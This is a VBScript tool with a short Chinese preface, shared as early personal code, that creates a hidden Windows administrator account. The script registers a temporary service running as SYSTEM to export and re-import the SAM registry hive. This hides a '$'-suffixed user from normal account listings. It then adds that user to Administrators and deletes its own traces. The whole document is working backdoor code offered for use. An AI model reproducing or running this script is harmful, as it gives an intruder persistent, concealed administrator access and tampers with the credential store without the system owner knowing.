早期写的代码,见笑了
'==============================================================
' Copyright (c) veterans. All rights reserved.
' ScriptName: ca.vbs
' Creation Date: 28/6/2007
' Last Modified: 28/6/2007
' Author: veterans
' E-mail: lxzzr@21cn.com
' Description: System hide account creation tool.
'==============================================================
On Error Resume Next
strUserName = Wscript.Arguments(0)
strPassWord = Wscript.Arguments(1)
'接受两个参数,分别为用户名和密码
If (lcase(right(wscript.fullname,11))="wscript.exe") Then
WScript.Quit(0)
End If
'判断脚本宿主
If wscript.arguments.count<2 Then
Wscript.Echo "System hide account creation tool."
Wscript.Echo ""
Wscript.Echo "Usage: cscript.exe //nologo " & WScript.ScriptName & " username$ password"
WScript.Quit(0)
End If
'判断输入的参数个数
Set ObjectNetwork = CreateObject("Wscript.Network")
strComputer = ObjectNetwork.ComputerName
'获取计算机名,必须用字符串,不能用.代替
Set ObjectWMI = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set CheckAccount = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strUserName & "'")
If CheckAccount.count<>0 Then
Wscript.Echo "Account already exists."
WScript.Quit(0)
End If
'检测账户是否存在
Set ObjectComputer = GetObject("WinNT://" & strComputer & ",computer")
Set CreateAccount = ObjectComputer.Create("user", strUserName)
CreateAccount.SetPassword strPassWord
CreateAccount.SetInfo
'添加用户,但不属于任何组
strServiceName = "ForCreateAccount"
Set CheckService = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strServiceName & "'")
If CheckService.count<>0 Then
strServiceName = "ForCreateAccount-test"
End If
'检测服务是否存在
Set ObjectSvr = ObjectWMI.Get("Win32_Service")
ObjectSvr.Create strServiceName, strServiceName, "c:\windows\regedit.exe /e %temp%\user.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users", 16, 2, "Automatic", true, Null, null
'添加服务以获得系统权限,导出注册表
Set ObjectServices = ObjectWMI.ExecQuery("Select * from Win32_Service where Name='" & strServiceName & "'")
For each ObjectService in ObjectServices
ObjectService.StartService()
ObjectService.StopService()
'导出注册表
Set ObjectAccount = GetObject("WinNT://" & strComputer & "/" & strUserName & ",user")
Set DelAccount = GetObject(ObjectAccount.Parent)
DelAccount.delete "user", ObjectAccount.Name
'删除用户
WScript.Sleep 1000
ChangeReturn = ObjectService.Change( , "c:\windows\regedit.exe /s %temp%\user.reg")
ObjectService.StartService()
ObjectService.StopService()
'导入注册表
ObjectService.Delete()
'删除服务
Set ObjectFiles = ObjectWMI.ExecQuery("Select * from cim_datafile where name='c:\\windows\\temp\\user.reg'")
For Each ObjectFile in ObjectFiles
ErrorReturn = ObjectFile.Delete
Next
'删除临时文件
Set AddGroup = GetObject("WinNT://" & strComputer & "/Administrators,group")
AddGroup.Add(ObjectAccount.ADsPath)
'将用户添加到管理员组
Next
Set ObjectGroupUsers = ObjectWMI.ExecQuery("Select * from Win32_GroupUser")
For Each ObjectUser In ObjectGroupUsers
Group = split(ObjectUser.GroupComponent,"=")
User = split(ObjectUser.PartComponent,"=")
If (User(2)="""" & strUserName & """" and Group(2)="""Administrators""") Then
Wscript.Echo "Account creation success."
WScript.Quit(0)
End If
Next
Wscript.Echo "Account creation failure."
'验证账户是否创建成功